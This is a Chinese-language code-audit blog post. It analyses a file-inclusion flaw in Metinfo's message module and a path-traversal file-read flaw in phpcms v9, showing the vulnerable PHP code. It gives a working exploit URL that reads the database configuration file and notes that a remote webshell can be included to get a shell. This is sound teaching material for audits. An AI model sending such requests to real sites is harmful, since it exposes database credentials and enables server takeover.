文件包含和文件读取漏洞代码审计

1，Metinfo文件包含漏洞分析

漏洞代码出现在/message/index.php文件中，代码如下：

if(!$metid)
    $metid='index';
if($metid!='index'){
    require_once $metid.'.php'
}else{
    /*省略*/
}

　　这一段代码很简单，使用require_once函数包含了传进去的参数$metid.php文件，我们可以包含本地文件，使用截断来进行利用。

如果是想要进行远程文件包含的话，需要服务器端的allow_url_include=on，也就是允许远程文件包含才可以，然后我们可以直接远程包含一句话木马拿shell

 

2，文件读取（下载）漏洞（phpcmsv9）

漏洞位于文件/phpcms/modules/search/index.php public_的public_get_suggest_keyword()函数

public function public_get_suggest_keyword(){
    $url=$_GET['url'].'&q='.$_GET['q'];
    $res=@file_get_contents($url);
    if(CHARSET != 'gbk'){
        $res=iconv('gbk',CHARSET,$res);
    }
    echo $res;
}

　　可以看到在该函数从GET方法里面获取要读取的URL和文件，使用file_get_contents函数来读取内容，当然我们要读取任意目录的文件的话，需要使用../来实现跳级

比如?url=&q=../../1.php，这样我们就可以利用跳级读取任意我们知道文件名的文件

最终利用这个漏洞读取数据库配置文件的EXP是：

/index.php?m=search&c=index&a=public_get_suggest_keyword&url=&q=../../phpsso_server/caches/configs/database.php

　　感觉这两个漏洞看上去不是很难，但是在当时安全意识比较落后的时候，应该很少有人能意识到这样编写代码所造成的危害。